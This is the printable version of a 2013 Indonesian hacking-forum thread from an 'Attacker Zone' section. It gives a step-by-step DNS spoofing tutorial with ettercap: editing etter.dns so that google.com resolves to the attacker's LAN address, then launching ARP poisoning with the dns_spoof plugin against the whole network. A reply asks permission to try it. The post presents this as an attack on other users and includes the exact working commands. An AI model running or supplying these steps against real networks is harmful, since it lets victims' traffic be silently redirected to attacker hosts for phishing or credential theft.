Indonesian Back|Track Team
[SHARE] DNS Spoofing (ettercap) - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Man In The Middle Attack (https://www.indonesianbacktrack.or.id/forum/forum-184.html)
+--- Thread: [SHARE] DNS Spoofing (ettercap) (/thread-5215.html)



[SHARE] DNS Spoofing (ettercap) - Arief.Kresna - 10-13-2013

Sorry seumpama ada yg sudah post tentang ini hehehehe
ane cuman berbagi Wink

DNS Spoofing adalah salah satu metode hacking Man In The Middle Attack (MITM). Hampir sama konsepnya dengan ARP Spoofing, tapi yang membedakan adalah Attacker akan memalsukan alamat IP dari sebuah domain.

DNS adalah Domain Name Server, yaitu server yang digunakan untuk mengetahui IP Address suatu host lewat host name-nya. Dalam dunia internet, komputer berkomunikasi satu sama lain dengan mengenali IP Address-nya. Namun bagi manusia tidak mungkin menghafalkan IP address tersebut, manusia lebih mudah menghapalkan kata-kata seperti www.yahoo.com, www.google.com, atau www.facebook.com. DNS berfungsi untuk mengkonversi nama yang bisa terbaca oleh manusia ke dalam IP addresshost yang bersangkutan untuk dihubungi.

Jadi ketika target melakukan request terhadap sebuah alamat domain dengan alamat IP A, dengan DNS Spoofing, oleh gateway request user tersebut akan di forward ke alamat IP palsu dari attacker.

Oke langsung saja kita akan mencoba melakukan DNS Spoofing menggunakan Ettercap

1. Cari dulu letak ettercap nya
Quote:[email protected]:~# locate etter.dns
/usr/share/ettercap/etter.dns

2. Edit file etter.dns nya
Quote:[email protected]:~# nano /usr/share/ettercap/etter.dns

3. Ubah isi nya menjadi : (Ini contoh)
Quote:google.com A 192.168.1.20
*.google.com A 192.168.1.20
www.google.com PTR 192.168.1.20

Jadi waktu 1 jaringan buka google.com itu akan mengarah ke IP ane.
Isi etter.dns nya bisa di ganti sesuka hati hehehe yang di atas itu hanya contoh

# Buat jaga" lebih baik kalau file etter.dns nya di backup dulu Smile

4. Kita start ettercap nya
Quote:[email protected]:~# ettercap -Tqi [interface] -P dns_spoof -M arp // //
contoh : [email protected]:~# ettercap -Tqi wlan0 -P dns_spoof -M arp // //

5. Selesai :-bd


RE: [SHARE] DNS Spoofing (ettercap) - dharaninja - 10-13-2013

Makasih bro
Izin nyoba ilmunya